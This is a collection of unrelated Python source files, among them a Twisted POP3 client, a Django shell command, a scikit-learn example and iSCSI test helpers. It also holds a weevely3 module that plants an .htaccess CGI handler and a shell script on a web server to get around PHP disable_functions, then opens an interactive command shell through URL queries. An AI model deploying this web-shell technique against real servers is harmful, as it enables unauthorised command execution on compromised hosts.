self.assertEquals(f.name, ps.archive_data_file)
self.assertEquals(2, len(ps.pages))
self.assertEquals('http://www.foo.com/', ps.pages[0].url)
self.assertEquals('http://www.bar.com/', ps.pages[1].url)
self.assertEquals('data_01.wpr', os.path.basename(ps.pages[0].archive_path))
self.assertEquals('data_02.wpr', os.path.basename(ps.pages[1].archive_path))
def testServingDirs(self):
directory_path = tempfile.mkdtemp()
try:
ps = page_set.PageSet.FromDict({
'serving_dirs': ['a/b'],
'pages': [
{'url': 'file://c/test.html'},
{'url': 'file://c/test.js'},
{'url': 'file://d/e/../test.html'},
]
}, directory_path)
finally:
os.rmdir(directory_path)
real_directory_path = os.path.realpath(directory_path)
expected_serving_dirs = set([os.path.join(real_directory_path, 'a', 'b')])
self.assertEquals(ps.serving_dirs, expected_serving_dirs)
self.assertEquals(ps[0].serving_dir, os.path.join(real_directory_path, 'c'))
self.assertEquals(ps[2].serving_dir, os.path.join(real_directory_path, 'd'))
|
maestrano/openerp | refs/heads/mno-master | openerp/addons/event_moodle/__init__.py | 54 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import event_moodle
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
thinkopensolutions/geraldo | refs/heads/master | site/newsite/django_1_0/django/core/management/commands/shell.py | 76 | import os
from django.core.management.base import NoArgsCommand
from optparse import make_option
class Command(NoArgsCommand):
option_list = NoArgsCommand.option_list + (
make_option('--plain', action='store_true', dest='plain',
help='Tells Django to use plain Python, not IPython.'),
)
help = "Runs a Python interactive interpreter. Tries to use IPython, if it's available."
requires_model_validation = False
def handle_noargs(self, **options):
# XXX: (Temporary) workaround for ticket #1796: force early loading of all
# models from installed apps.
from django.db.models.loading import get_models
loaded_models = get_models()
use_plain = options.get('plain', False)
try:
if use_plain:
# Don't bother loading IPython, because the user wants plain Python.
raise ImportError
import IPython
# Explicitly pass an empty list as arguments, because otherwise IPython
# would use sys.argv from this script.
shell = IPython.Shell.IPShell(argv=[])
shell.mainloop()
except ImportError:
import code
# Set up a dictionary to serve as the environment for the shell, so
# that tab completion works on objects that are imported at runtime.
# See ticket 5082.
imported_objects = {}
try: # Try activating rlcompleter, because it's handy.
import readline
except ImportError:
pass
else:
# We don't have to wrap the following import in a 'try', because
# we already know 'readline' was imported successfully.
import rlcompleter
readline.set_completer(rlcompleter.Completer(imported_objects).complete)
readline.parse_and_bind("tab:complete")
# We want to honor both $PYTHONSTARTUP and .pythonrc.py, so follow system
# conventions and get $PYTHONSTARTUP first then import user.
if not use_plain:
pythonrc = os.environ.get("PYTHONSTARTUP")
if pythonrc and os.path.isfile(pythonrc):
try:
execfile(pythonrc)
except NameError:
pass
# This will import .pythonrc.py as a side-effect
import user
code.interact(local=imported_objects)
|
ojengwa/oh-mainline | refs/heads/master | vendor/packages/twisted/twisted/mail/pop3client.py | 28 | # -*- test-case-name: twisted.mail.test.test_pop3client -*-
# Copyright (c) 2001-2004 Divmod Inc.
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
POP3 client protocol implementation
Don't use this module directly. Use twisted.mail.pop3 instead.
@author: Jp Calderone
"""
import re
from twisted.python import log
from twisted.python.hashlib import md5
from twisted.internet import defer
from twisted.protocols import basic
from twisted.protocols import policies
from twisted.internet import error
from twisted.internet import interfaces
OK = '+OK'
ERR = '-ERR'
class POP3ClientError(Exception):
"""Base class for all exceptions raised by POP3Client.
"""
class InsecureAuthenticationDisallowed(POP3ClientError):
"""Secure authentication was required but no mechanism could be found.
"""
class TLSError(POP3ClientError):
"""
Secure authentication was required but either the transport does
not support TLS or no TLS context factory was supplied.
"""
class TLSNotSupportedError(POP3ClientError):
"""
Secure authentication was required but the server does not support
TLS.
"""
class ServerErrorResponse(POP3ClientError):
"""The server returned an error response to a request.
"""
def __init__(self, reason, consumer=None):
POP3ClientError.__init__(self, reason)
self.consumer = consumer
class LineTooLong(POP3ClientError):
"""The server sent an extremely long line.
"""
class _ListSetter:
# Internal helper. POP3 responses sometimes occur in the
# form of a list of lines containing two pieces of data,
# a message index and a value of some sort. When a message
# is deleted, it is omitted from these responses. The
# setitem method of this class is meant to be called with
# these two values. In the cases where indexes are skipped,
# it takes care of padding out the missing values with None.
def __init__(self, L):
self.L = L
def setitem(self, (item, value)):
diff = item - len(self.L) + 1
if diff > 0:
self.L.extend([None] * diff)
self.L[item] = value
def _statXform(line):
# Parse a STAT response
numMsgs, totalSize = line.split(None, 1)
return int(numMsgs), int(totalSize)
def _listXform(line):
# Parse a LIST response
index, size = line.split(None, 1)
return int(index) - 1, int(size)
def _uidXform(line):
# Parse a UIDL response
index, uid = line.split(None, 1)
return int(index) - 1, uid
def _codeStatusSplit(line):
# Parse an +OK or -ERR response
parts = line.split(' ', 1)
if len(parts) == 1:
return parts[0], ''
return parts
def _dotUnquoter(line):
"""
C{'.'} characters which begin a line of a message are doubled to avoid
confusing with the terminating C{'.\\r\\n'} sequence. This function
unquotes them.
"""
if line.startswith('..'):
return line[1:]
return line
class POP3Client(basic.LineOnlyReceiver, policies.TimeoutMixin):
"""POP3 client protocol implementation class
Instances of this class provide a convenient, efficient API for
retrieving and deleting messages from a POP3 server.
@type startedTLS: C{bool}
@ivar startedTLS: Whether TLS has been negotiated successfully.
@type allowInsecureLogin: C{bool}
@ivar allowInsecureLogin: Indicate whether login() should be
allowed if the server offers no authentication challenge and if
our transport does not offer any protection via encryption.
@type serverChallenge: C{str} or C{None}
@ivar serverChallenge: Challenge received from the server
@type timeout: C{int}
@ivar timeout: Number of seconds to wait before timing out a
connection. If the number is <= 0, no timeout checking will be
performed.
"""
startedTLS = False
allowInsecureLogin = False
timeout = 0
serverChallenge = None
# Capabilities are not allowed to change during the session
# (except when TLS is negotiated), so cache the first response and
# use that for all later lookups
_capCache = None
# Regular expression to search for in the challenge string in the server
# greeting line.
_challengeMagicRe = re.compile('(<[^>]+>)')
# List of pending calls.
# We are a pipelining API but don't actually
# support pipelining on the network yet.
_blockedQueue = None
# The Deferred to which the very next result will go.
_waiting = None
# Whether we dropped the connection because of a timeout
_timedOut = False
# If the server sends an initial -ERR, this is the message it sent
# with it.
_greetingError = None
def _blocked(self, f, *a):
# Internal helper. If commands are being blocked, append
# the given command and arguments to a list and return a Deferred
# that will be chained with the return value of the function
# when it eventually runs. Otherwise, set up for commands to be
# blocked and return None.
if self._blockedQueue is not None:
d = defer.Deferred()
self._blockedQueue.append((d, f, a))
return d
self._blockedQueue = []
return None
def _unblock(self):
# Internal helper. Indicate that a function has completed.
# If there are blocked commands, run the next one. If there
# are not, set up for the next command to not be blocked.
if self._blockedQueue == []:
self._blockedQueue = None
elif self._blockedQueue is not None:
_blockedQueue = self._blockedQueue
self._blockedQueue = None
d, f, a = _blockedQueue.pop(0)
d2 = f(*a)
d2.chainDeferred(d)
# f is a function which uses _blocked (otherwise it wouldn't
# have gotten into the blocked queue), which means it will have
# re-set _blockedQueue to an empty list, so we can put the rest
# of the blocked queue back into it now.
self._blockedQueue.extend(_blockedQueue)
def sendShort(self, cmd, args):
# Internal helper. Send a command to which a short response
# is expected. Return a Deferred that fires when the response
# is received. Block all further commands from being sent until
# the response is received. Transition the state to SHORT.
d = self._blocked(self.sendShort, cmd, args)
if d is not None:
return d
if args:
self.sendLine(cmd + ' ' + args)
else:
self.sendLine(cmd)
self.state = 'SHORT'
self._waiting = defer.Deferred()
return self._waiting
def sendLong(self, cmd, args, consumer, xform):
# Internal helper. Send a command to which a multiline
# response is expected. Return a Deferred that fires when
# the entire response is received. Block all further commands
# from being sent until the entire response is received.
# Transition the state to LONG_INITIAL.
d = self._blocked(self.sendLong, cmd, args, consumer, xform)
if d is not None:
return d
if args:
self.sendLine(cmd + ' ' + args)
else:
self.sendLine(cmd)
self.state = 'LONG_INITIAL'
self._xform = xform
self._consumer = consumer
self._waiting = defer.Deferred()
return self._waiting
# Twisted protocol callback
def connectionMade(self):
if self.timeout > 0:
self.setTimeout(self.timeout)
self.state = 'WELCOME'
self._blockedQueue = []
def timeoutConnection(self):
self._timedOut = True
self.transport.loseConnection()
def connectionLost(self, reason):
if self.timeout > 0:
self.setTimeout(None)
if self._timedOut:
reason = error.TimeoutError()
elif self._greetingError:
reason = ServerErrorResponse(self._greetingError)
d = []
if self._waiting is not None:
d.append(self._waiting)
self._waiting = None
if self._blockedQueue is not None:
d.extend([deferred for (deferred, f, a) in self._blockedQueue])
self._blockedQueue = None
for w in d:
w.errback(reason)
def lineReceived(self, line):
if self.timeout > 0:
self.resetTimeout()
state = self.state
self.state = None
state = getattr(self, 'state_' + state)(line) or state
if self.state is None:
self.state = state
def lineLengthExceeded(self, buffer):
# XXX - We need to be smarter about this
if self._waiting is not None:
waiting, self._waiting = self._waiting, None
waiting.errback(LineTooLong())
self.transport.loseConnection()
# POP3 Client state logic - don't touch this.
def state_WELCOME(self, line):
# WELCOME is the first state. The server sends one line of text
# greeting us, possibly with an APOP challenge. Transition the
# state to WAITING.
code, status = _codeStatusSplit(line)
if code != OK:
self._greetingError = status
self.transport.loseConnection()
else:
m = self._challengeMagicRe.search(status)
if m is not None:
self.serverChallenge = m.group(1)
self.serverGreeting(status)
self._unblock()
return 'WAITING'
def state_WAITING(self, line):
# The server isn't supposed to send us anything in this state.
log.msg("Illegal line from server: " + repr(line))
def state_SHORT(self, line):
# This is the state we are in when waiting for a single
# line response. Parse it and fire the appropriate callback
# or errback. Transition the state back to WAITING.
deferred, self._waiting = self._waiting, None
self._unblock()
code, status = _codeStatusSplit(line)
if code == OK:
deferred.callback(status)
else:
deferred.errback(ServerErrorResponse(status))
return 'WAITING'
def state_LONG_INITIAL(self, line):
# This is the state we are in when waiting for the first
# line of a long response. Parse it and transition the
# state to LONG if it is an okay response; if it is an
# error response, fire an errback, clean up the things
# waiting for a long response, and transition the state
# to WAITING.
code, status = _codeStatusSplit(line)
if code == OK:
return 'LONG'
consumer = self._consumer
deferred = self._waiting
self._consumer = self._waiting = self._xform = None
self._unblock()
deferred.errback(ServerErrorResponse(status, consumer))
return 'WAITING'
def state_LONG(self, line):
# This is the state for each line of a long response.
# If it is the last line, finish things, fire the
# Deferred, and transition the state to WAITING.
# Otherwise, pass the line to the consumer.
if line == '.':
consumer = self._consumer
deferred = self._waiting
self._consumer = self._waiting = self._xform = None
self._unblock()
deferred.callback(consumer)
return 'WAITING'
else:
if self._xform is not None:
self._consumer(self._xform(line))
else:
self._consumer(line)
return 'LONG'
# Callbacks - override these
def serverGreeting(self, greeting):
"""Called when the server has sent us a greeting.
@type greeting: C{str} or C{None}
@param greeting: The status message sent with the server
greeting. For servers implementing APOP authentication, this
will be a challenge string. .
"""
# External API - call these (most of 'em anyway)
def startTLS(self, contextFactory=None):
"""
Initiates a 'STLS' request and negotiates the TLS / SSL
Handshake.
@type contextFactory: C{ssl.ClientContextFactory} @param
contextFactory: The context factory with which to negotiate
TLS. If C{None}, try to create a new one.
@return: A Deferred which fires when the transport has been
secured according to the given contextFactory, or which fails
if the transport cannot be secured.
"""
tls = interfaces.ITLSTransport(self.transport, None)
if tls is None:
return defer.fail(TLSError(
"POP3Client transport does not implement "
"interfaces.ITLSTransport"))
if contextFactory is None:
contextFactory = self._getContextFactory()
if contextFactory is None:
return defer.fail(TLSError(
"POP3Client requires a TLS context to "
"initiate the STLS handshake"))
d = self.capabilities()
d.addCallback(self._startTLS, contextFactory, tls)
return d
def _startTLS(self, caps, contextFactory, tls):
assert not self.startedTLS, "Client and Server are currently communicating via TLS"
if 'STLS' not in caps:
return defer.fail(TLSNotSupportedError(
"Server does not support secure communication "
"via TLS / SSL"))
d = self.sendShort('STLS', None)
d.addCallback(self._startedTLS, contextFactory, tls)
d.addCallback(lambda _: self.capabilities())
return d
def _startedTLS(self, result, context, tls):
self.transport = tls
self.transport.startTLS(context)
self._capCache = None
self.startedTLS = True
return result
def _getContextFactory(self):
try:
from twisted.internet import ssl
except ImportError:
return None
else:
context = ssl.ClientContextFactory()
context.method = ssl.SSL.TLSv1_METHOD
return context
def login(self, username, password):
"""Log into the server.
If APOP is available it will be used. Otherwise, if TLS is
available an 'STLS' session will be started and plaintext
login will proceed. Otherwise, if the instance attribute
allowInsecureLogin is set to True, insecure plaintext login
will proceed. Otherwise, InsecureAuthenticationDisallowed
will be raised (asynchronously).
@param username: The username with which to log in.
@param password: The password with which to log in.
@rtype: C{Deferred}
@return: A deferred which fires when login has
completed.
"""
d = self.capabilities()
d.addCallback(self._login, username, password)
return d
def _login(self, caps, username, password):
if self.serverChallenge is not None:
return self._apop(username, password, self.serverChallenge)
tryTLS = 'STLS' in caps
#If our transport supports switching to TLS, we might want to try to switch to TLS.
tlsableTransport = interfaces.ITLSTransport(self.transport, None) is not None
# If our transport is not already using TLS, we might want to try to switch to TLS.
nontlsTransport = interfaces.ISSLTransport(self.transport, None) is None
if not self.startedTLS and tryTLS and tlsableTransport and nontlsTransport:
d = self.startTLS()
d.addCallback(self._loginTLS, username, password)
return d
elif self.startedTLS or not nontlsTransport or self.allowInsecureLogin:
return self._plaintext(username, password)
else:
return defer.fail(InsecureAuthenticationDisallowed())
def _loginTLS(self, res, username, password):
return self._plaintext(username, password)
def _plaintext(self, username, password):
# Internal helper. Send a username/password pair, returning a Deferred
# that fires when both have succeeded or fails when the server rejects
# either.
return self.user(username).addCallback(lambda r: self.password(password))
def _apop(self, username, password, challenge):
# Internal helper. Computes and sends an APOP response. Returns
# a Deferred that fires when the server responds to the response.
digest = md5(challenge + password).hexdigest()
return self.apop(username, digest)
def apop(self, username, digest):
"""Perform APOP login.
This should be used in special circumstances only, when it is
known that the server supports APOP authentication, and APOP
authentication is absolutely required. For the common case,
use L{login} instead.
@param username: The username with which to log in.
@param digest: The challenge response to authenticate with.
"""
return self.sendShort('APOP', username + ' ' + digest)
def user(self, username):
"""Send the user command.
This performs the first half of plaintext login. Unless this
is absolutely required, use the L{login} method instead.
@param username: The username with which to log in.
"""
return self.sendShort('USER', username)
def password(self, password):
"""Send the password command.
This performs the second half of plaintext login. Unless this
is absolutely required, use the L{login} method instead.
@param password: The plaintext password with which to authenticate.
"""
return self.sendShort('PASS', password)
def delete(self, index):
"""Delete a message from the server.
@type index: C{int}
@param index: The index of the message to delete.
This is 0-based.
@rtype: C{Deferred}
@return: A deferred which fires when the delete command
is successful, or fails if the server returns an error.
"""
return self.sendShort('DELE', str(index + 1))
def _consumeOrSetItem(self, cmd, args, consumer, xform):
# Internal helper. Send a long command. If no consumer is
# provided, create a consumer that puts results into a list
# and return a Deferred that fires with that list when it
# is complete.
if consumer is None:
L = []
consumer = _ListSetter(L).setitem
return self.sendLong(cmd, args, consumer, xform).addCallback(lambda r: L)
return self.sendLong(cmd, args, consumer, xform)
def _consumeOrAppend(self, cmd, args, consumer, xform):
# Internal helper. Send a long command. If no consumer is
# provided, create a consumer that appends results to a list
# and return a Deferred that fires with that list when it is
# complete.
if consumer is None:
L = []
consumer = L.append
return self.sendLong(cmd, args, consumer, xform).addCallback(lambda r: L)
return self.sendLong(cmd, args, consumer, xform)
def capabilities(self, useCache=True):
"""Retrieve the capabilities supported by this server.
Not all servers support this command. If the server does not
support this, it is treated as though it returned a successful
response listing no capabilities. At some future time, this may be
changed to instead seek out information about a server's
capabilities in some other fashion (only if it proves useful to do
so, and only if there are servers still in use which do not support
CAPA but which do support POP3 extensions that are useful).
@type useCache: C{bool}
@param useCache: If set, and if capabilities have been
retrieved previously, just return the previously retrieved
results.
@return: A Deferred which fires with a C{dict} mapping C{str}
to C{None} or C{list}s of C{str}. For example::
C: CAPA
S: +OK Capability list follows
S: TOP
S: USER
S: SASL CRAM-MD5 KERBEROS_V4
S: RESP-CODES
S: LOGIN-DELAY 900
S: PIPELINING
S: EXPIRE 60
S: UIDL
S: IMPLEMENTATION Shlemazle-Plotz-v302
S: .
will be lead to a result of::
| {'TOP': None,
| 'USER': None,
| 'SASL': ['CRAM-MD5', 'KERBEROS_V4'],
| 'RESP-CODES': None,
| 'LOGIN-DELAY': ['900'],
| 'PIPELINING': None,
| 'EXPIRE': ['60'],
| 'UIDL': None,
| 'IMPLEMENTATION': ['Shlemazle-Plotz-v302']}
"""
if useCache and self._capCache is not None:
return defer.succeed(self._capCache)
cache = {}
def consume(line):
tmp = line.split()
if len(tmp) == 1:
cache[tmp[0]] = None
elif len(tmp) > 1:
cache[tmp[0]] = tmp[1:]
def capaNotSupported(err):
err.trap(ServerErrorResponse)
return None
def gotCapabilities(result):
self._capCache = cache
return cache
d = self._consumeOrAppend('CAPA', None, consume, None)
d.addErrback(capaNotSupported).addCallback(gotCapabilities)
return d
def noop(self):
"""Do nothing, with the help of the server.
No operation is performed. The returned Deferred fires when
the server responds.
"""
return self.sendShort("NOOP", None)
def reset(self):
"""Remove the deleted flag from any messages which have it.
The returned Deferred fires when the server responds.
"""
return self.sendShort("RSET", None)
def retrieve(self, index, consumer=None, lines=None):
"""Retrieve a message from the server.
If L{consumer} is not None, it will be called with
each line of the message as it is received. Otherwise,
the returned Deferred will be fired with a list of all
the lines when the message has been completely received.
"""
idx = str(index + 1)
if lines is None:
return self._consumeOrAppend('RETR', idx, consumer, _dotUnquoter)
return self._consumeOrAppend('TOP', '%s %d' % (idx, lines), consumer, _dotUnquoter)
def stat(self):
"""Get information about the size of this mailbox.
The returned Deferred will be fired with a tuple containing
the number or messages in the mailbox and the size (in bytes)
of the mailbox.
"""
return self.sendShort('STAT', None).addCallback(_statXform)
def listSize(self, consumer=None):
"""Retrieve a list of the size of all messages on the server.
If L{consumer} is not None, it will be called with two-tuples
of message index number and message size as they are received.
Otherwise, a Deferred which will fire with a list of B{only}
message sizes will be returned. For messages which have been
deleted, None will be used in place of the message size.
"""
return self._consumeOrSetItem('LIST', None, consumer, _listXform)
def listUID(self, consumer=None):
"""Retrieve a list of the UIDs of all messages on the server.
If L{consumer} is not None, it will be called with two-tuples
of message index number and message UID as they are received.
Otherwise, a Deferred which will fire with of list of B{only}
message UIDs will be returned. For messages which have been
deleted, None will be used in place of the message UID.
"""
return self._consumeOrSetItem('UIDL', None, consumer, _uidXform)
def quit(self):
"""Disconnect from the server.
"""
return self.sendShort('QUIT', None)
__all__ = [
# Exceptions
'InsecureAuthenticationDisallowed', 'LineTooLong', 'POP3ClientError',
'ServerErrorResponse', 'TLSError', 'TLSNotSupportedError',
# Protocol classes
'POP3Client']
|
ndingwall/scikit-learn | refs/heads/master | examples/semi_supervised/plot_label_propagation_digits.py | 22 | """
===================================================
Label Propagation digits: Demonstrating performance
===================================================
This example demonstrates the power of semisupervised learning by
training a Label Spreading model to classify handwritten digits
with sets of very few labels.
The handwritten digit dataset has 1797 total points. The model will
be trained using all points, but only 30 will be labeled. Results
in the form of a confusion matrix and a series of metrics over each
class will be very good.
At the end, the top 10 most uncertain predictions will be shown.
"""
print(__doc__)
# Authors: Clay Woolam <clay@woolam.org>
# License: BSD
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
from sklearn import datasets
from sklearn.semi_supervised import LabelSpreading
from sklearn.metrics import confusion_matrix, classification_report
digits = datasets.load_digits()
rng = np.random.RandomState(2)
indices = np.arange(len(digits.data))
rng.shuffle(indices)
X = digits.data[indices[:340]]
y = digits.target[indices[:340]]
images = digits.images[indices[:340]]
n_total_samples = len(y)
n_labeled_points = 40
indices = np.arange(n_total_samples)
unlabeled_set = indices[n_labeled_points:]
# #############################################################################
# Shuffle everything around
y_train = np.copy(y)
y_train[unlabeled_set] = -1
# #############################################################################
# Learn with LabelSpreading
lp_model = LabelSpreading(gamma=.25, max_iter=20)
lp_model.fit(X, y_train)
predicted_labels = lp_model.transduction_[unlabeled_set]
true_labels = y[unlabeled_set]
cm = confusion_matrix(true_labels, predicted_labels, labels=lp_model.classes_)
print("Label Spreading model: %d labeled & %d unlabeled points (%d total)" %
(n_labeled_points, n_total_samples - n_labeled_points, n_total_samples))
print(classification_report(true_labels, predicted_labels))
print("Confusion matrix")
print(cm)
# #############################################################################
# Calculate uncertainty values for each transduced distribution
pred_entropies = stats.distributions.entropy(lp_model.label_distributions_.T)
# #############################################################################
# Pick the top 10 most uncertain labels
uncertainty_index = np.argsort(pred_entropies)[-10:]
# #############################################################################
# Plot
f = plt.figure(figsize=(7, 5))
for index, image_index in enumerate(uncertainty_index):
image = images[image_index]
sub = f.add_subplot(2, 5, index + 1)
sub.imshow(image, cmap=plt.cm.gray_r)
plt.xticks([])
plt.yticks([])
sub.set_title('predict: %i\ntrue: %i' % (
lp_model.transduction_[image_index], y[image_index]))
f.suptitle('Learning with small amount of labeled data')
plt.show()
|
epinaa/weevely3 | refs/heads/master | modules/audit/disablefunctionbypass.py | 1 | from core.vectors import PhpCode, ShellCmd, ModuleExec, Os
from core.module import Module, Status
from core.loggers import log
from core import modules
from core import messages
from utils import strings
from utils import http
import string
import os
class Disablefunctionbypass(Module):
""" Bypassing system-like disable_function with mod_cgi and .htaccess"""
def init(self):
self.register_info(
{
'author': [
'Emilio Pinna',
# mod_cgi + .htaccess bypassing technique by ASDIZZLE
# https://blog.asdizzle.com/index.php/2016/05/02/getting-shell-access-with-php-system-functions-disabled/
'ASDIZZLE' ],
'license': 'GPLv3'
}
)
self.register_arguments([
{ 'name' : 'rpath', 'help' : 'Remote path. If it is a folder find the first writable folder in it', 'default' : '.', 'nargs' : '?' },
{ 'name' : '-script', 'help' : 'CGI script to upload', 'default' : os.path.join(self.folder, 'cgi.sh') },
{ 'name' : '-just-run', 'help' : 'Skip install and run shell through URL' },
])
self.register_vectors( [
PhpCode(
"""(is_callable('apache_get_modules')&&in_array('mod_cgi', apache_get_modules())&&print(1))||print(0);""",
postprocess = lambda x: True if x == '1' else False,
name = 'mod_cgi'
),
ModuleExec(
'file_upload2web',
[ '/bogus/.htaccess', '-content', 'Options +ExecCGI\nAddHandler cgi-script .${extension}' ],
name = 'install_htaccess'
),
ModuleExec(
'file_upload',
[ '${script}', '${rpath}' ],
name = 'install_script'
),
PhpCode(
"""(is_callable('chmod')&&chmod('${rpath}', 0777)&&print(1))||print(0);""",
postprocess = lambda x: True if x == '1' else False,
name = 'chmod'
),
ModuleExec(
'file_rm',
[ '${path}' ],
name = 'remove'
),
])
def _clean(self, htaccess_absolute_path, script_absolute_path):
log.warning('Deleting %s and %s' % (htaccess_absolute_path, script_absolute_path))
self.vectors.get_result('remove', format_args = { 'path': htaccess_absolute_path })
self.vectors.get_result('remove', format_args = { 'path': script_absolute_path })
def _install(self):
if not self.vectors.get_result('mod_cgi'):
log.warning(messages.module_audit_disablefunctionbypass.error_mod_cgi_disabled)
return
filename = strings.randstr(5, charset = string.ascii_lowercase)
ext = strings.randstr(3, charset = string.ascii_lowercase)
result_install_htaccess = self.vectors.get_result(
'install_htaccess',
format_args = { 'extension': ext }
)
if (
not result_install_htaccess or
not result_install_htaccess[0][0] or
not result_install_htaccess[0][1]
):
log.warning(messages.module_audit_disablefunctionbypass.error_installing_htaccess)
return
htaccess_absolute_path = result_install_htaccess[0][0]
script_absolute_path = '%s.%s' % (htaccess_absolute_path.replace('.htaccess',filename), ext)
script_url = '%s.%s' % (
result_install_htaccess[0][1].replace('.htaccess',filename),
ext
)
result_install_script = self.vectors.get_result(
'install_script',
format_args = { 'script' : self.args.get('script'), 'rpath': script_absolute_path }
)
if not result_install_script:
log.warning(messages.module_audit_disablefunctionbypass.error_uploading_script_to_s % script_absolute_path)
self._clean(htaccess_absolute_path, script_absolute_path)
return
result_chmod = self.vectors.get_result(
'chmod',
format_args = { 'rpath': script_absolute_path }
)
if not result_chmod:
log.warning(messages.module_audit_disablefunctionbypass.error_changing_s_mode % script_absolute_path)
self._clean(htaccess_absolute_path, script_absolute_path)
return
if not self._check_response(script_url):
log.warning(messages.module_audit_disablefunctionbypass.error_s_unexpected_output % (script_url))
self._clean(htaccess_absolute_path, script_absolute_path)
return
log.warning(messages.module_audit_disablefunctionbypass.cgi_installed_remove_s_s % (htaccess_absolute_path, script_absolute_path))
log.warning(messages.module_audit_disablefunctionbypass.run_s_skip_reinstalling % (script_url))
return script_url
def _check_response(self, script_url):
script_query = '%s?c=' % (script_url)
query_random_str = strings.randstr(5)
command_query = '%secho%%20%s' % (script_query, query_random_str)
result_request = http.request(command_query)
return query_random_str in result_request
def run(self):
# Terminate if shell_sh is active
if self.session['shell_sh']['status'] == Status.RUN:
log.warning(messages.module_audit_disablefunctionbypass.error_sh_commands_enabled)
return
# Install if -just-run option hasn't been provided, else directly check the backdoor
script_url = self.args.get('just_run')
if not script_url:
script_url = self._install()
if not script_url:
return
elif not self._check_response(script_url):
log.warning(messages.module_audit_disablefunctionbypass.error_s_unexpected_output % (script_url))
return
log.warning(messages.module_audit_disablefunctionbypass.requests_not_obfuscated)
# Console loop
while True:
query = raw_input('CGI shell replacement $ ').strip()
if not query:
continue
if query == 'quit':
break
log.info(http.request('%s?c=%s' % (script_url, query)))
|
rbian/virt-test | refs/heads/master | virttest/iscsi.py | 1 | """
Basic iscsi support for Linux host with the help of commands
iscsiadm and tgtadm.
This include the basic operates such as login and get device name by
target name. And it can support the real iscsi access and emulated
iscsi in localhost then access it.
"""
import re
import os
import logging
from autotest.client import os_dep
from autotest.client.shared import utils, error
from virttest import utils_selinux
def iscsi_get_sessions():
"""
Get the iscsi sessions activated
"""
cmd = "iscsiadm --mode session"
output = utils.system_output(cmd, ignore_status=True)
sessions = []
if "No active sessions" not in output:
for session in output.splitlines():
ip_addr = session.split()[2].split(',')[0]
target = session.split()[3]
sessions.append((ip_addr, target))
return sessions
def iscsi_get_nodes():
"""
Get the iscsi nodes
"""
cmd = "iscsiadm --mode node"
output = utils.system_output(cmd)
pattern = r"(\d+\.\d+\.\d+\.\d+|\W:{2}\d\W):\d+,\d+\s+([\w\.\-:\d]+)"
nodes = []
if "No records found" not in output:
nodes = re.findall(pattern, output)
return nodes
def iscsi_login(target_name, portal):
"""
Login to a target with the target name
:param target_name: Name of the target
:params portal: Hostname/Ip for iscsi server
"""
cmd = "iscsiadm --mode node --login --targetname %s" % target_name
cmd += " --portal %s" % portal
output = utils.system_output(cmd)
target_login = ""
if "successful" in output:
target_login = target_name
return target_login
def iscsi_logout(target_name=None):
"""
Logout from a target. If the target name is not set then logout all
targets.
:params target_name: Name of the target.
"""
if target_name:
cmd = "iscsiadm --mode node --logout -T %s" % target_name
else:
cmd = "iscsiadm --mode node --logout all"
output = utils.system_output(cmd)
target_logout = ""
if "successful" in output:
target_logout = target_name
return target_logout
def iscsi_discover(portal_ip):
"""
Query from iscsi server for available targets
:param portal_ip: Ip for iscsi server
"""
cmd = "iscsiadm -m discovery -t sendtargets -p %s" % portal_ip
output = utils.system_output(cmd, ignore_status=True)
session = ""
if "Invalid" in output:
logging.debug(output)
else:
session = output
return session
class Iscsi(object):
"""
Basic iscsi support class. Will handle the emulated iscsi export and
access to both real iscsi and emulated iscsi device.
"""
def __init__(self, params, root_dir="/tmp"):
os_dep.command("iscsiadm")
self.target = params.get("target")
self.export_flag = False
if params.get("portal_ip"):
self.portal_ip = params.get("portal_ip")
else:
self.portal_ip = "localhost"
if params.get("iscsi_thread_id"):
self.id = params.get("iscsi_thread_id")
else:
self.id = utils.generate_random_string(4)
self.initiator = params.get("initiator")
# CHAP AUTHENTICATION
self.chap_flag = False
self.chap_user = params.get("chap_user")
self.chap_passwd = params.get("chap_passwd")
if self.chap_user and self.chap_passwd:
self.chap_flag = True
if params.get("emulated_image"):
self.initiator = None
os_dep.command("tgtadm")
emulated_image = params.get("emulated_image")
self.emulated_image = os.path.join(root_dir, emulated_image)
self.emulated_id = ""
self.emulated_size = params.get("image_size")
self.unit = self.emulated_size[-1].upper()
self.emulated_size = self.emulated_size[:-1]
# maps K,M,G,T => (count, bs)
emulated_size = {'K': (1, 1),
'M': (1, 1024),
'G': (1024, 1024),
'T': (1024, 1048576),
}
if emulated_size.has_key(self.unit):
block_size = emulated_size[self.unit][1]
size = int(self.emulated_size) * emulated_size[self.unit][0]
self.emulated_expect_size = block_size * size
self.create_cmd = ("dd if=/dev/zero of=%s count=%s bs=%sK"
% (self.emulated_image, size, block_size))
def logged_in(self):
"""
Check if the session is login or not.
"""
sessions = iscsi_get_sessions()
login = False
if self.target in map(lambda x: x[1], sessions):
login = True
return login
def portal_visible(self):
"""
Check if the portal can be found or not.
"""
return bool(re.findall("%s$" % self.target,
iscsi_discover(self.portal_ip), re.M))
def login(self):
"""
Login session for both real iscsi device and emulated iscsi. Include
env check and setup.
"""
login_flag = False
if self.portal_visible():
login_flag = True
elif self.initiator:
logging.debug("Try to update iscsi initiatorname")
cmd = "mv /etc/iscsi/initiatorname.iscsi "
cmd += "/etc/iscsi/initiatorname.iscsi-%s" % self.id
utils.system(cmd)
fd = open("/etc/iscsi/initiatorname.iscsi", 'w')
fd.write("InitiatorName=%s" % self.initiator)
fd.close()
utils.system("service iscsid restart")
if self.portal_visible():
login_flag = True
elif self.emulated_image:
self.export_target()
utils.system("service iscsid restart")
if self.portal_visible():
login_flag = True
if login_flag:
iscsi_login(self.target, self.portal_ip)
def get_device_name(self):
"""
Get device name from the target name.
"""
cmd = "iscsiadm -m session -P 3"
device_name = ""
if self.logged_in():
output = utils.system_output(cmd)
